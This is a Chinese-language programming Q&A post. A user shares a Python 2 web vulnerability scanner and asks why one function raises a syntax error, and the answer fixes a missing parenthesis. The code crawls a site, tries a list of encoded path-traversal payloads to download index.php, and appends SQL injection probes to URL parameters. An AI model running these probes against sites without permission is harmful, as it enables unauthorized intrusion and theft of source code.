我正在尝试编写一个简单的Web应用程序。该应用程序是一个扫描仪。这是我的代码:
import os, sys, urllib2, re, urlparse
l = []
n_l = []
b_l = []
def url(url):
if not url.startswith('http://'):
url = 'http://'+url
else:
url = url
return url
def get_links(url):
try:
res = urllib2.urlopen(url)
print 'Loading ',url
print 'Status ',res.getcode()
string = res.read()
for link in re.findall(r'href=[\'"]?([^\'" >]+)', string):
if not link.startswith('http://'):
link = urlparse.urljoin(url, link)
else:
link = link
l.append(link)
except Exception, e:
print str(e)
def transvers(app):
for rl in l:
if '?' and '=' in rl:
rl = rl.split('=')[0]+'='
rl = rl + app
print 'Download Index.php from %s'%rl
try:
fi_le = urllib2.urlopen(rl)
output = open('index.php','a')
output.write(fi_le.read())
output.close()
except Exception, exceptions:
print str(exceptions)
def sql_url():
for c in l:
if '=' in c:
if c.endswith(('1', '2', '3', '4', '5', '6', '7', '8', '9', '0')):
n_l.append(c+"'")
b_l.append(c+' AND 1 = 0')
def sql_test():
for inj in n_l:
responz = urllib2.urlopen(inj).read()
print 'Trying SQL injection in %s'%inj
if 'error in your SQL syntax' in responz:
print 'SQL BUG FOUND IN %s'%inj
else:
print 'SQL bug not found in %s'%inj
def blind_injection():
for blnd in b_l:
rspn = urllib2.urlopen(blnd).read()
print 'Opening ......... %s'%blnd
rsp = urllib2.urlopen(blnd.split(' AND 1 = 0')[0].read()
print 'Opening ........ %s'%blnd.split(' AND 1 = 0')[0]
print 'Comparing output'
if rspn == rsp:
print 'Blind SQL injection bug not found in %s'%blnd
else:
print 'BLIND SQL IJECTION BUG FOUND IN %s'%blnd
def main():
ins = url(sys.argv[1])
get_links(ins)
col = ['../index.php', '%2e%2e%2findex,php', '%2e%2e/index.php', '..%2findex.php', '%2e%2e%5cindex.php', '%2e%2e\index.php', '..%5cindex.php','%252e%252e%255cindex.php', '..%255cindex.php','..%c0%afindex.php','..%c1%9cindex.php']
for h in col:
transvers(h)
sql_url()
sql_test()
blind_injection()
main()
除blind_injection()
函数外,一切正常。这将返回错误
File "dt.py", line 57
print 'Opening ........ %s'%blnd.split(' AND 1 = 0')[0]
^
SyntaxError: invalid syntax
如何解决此错误?
答案 0 :(得分:2)
你有一个问题,你在[0]
之后缺少一个结束语,这导致错误而不是print语句:
rsp = urllib2.urlopen(blnd.split(' AND 1 = 0')[0].read()
^^
应该是:
rsp = urllib2.urlopen(blnd.split(' AND 1 = 0')[0]).read()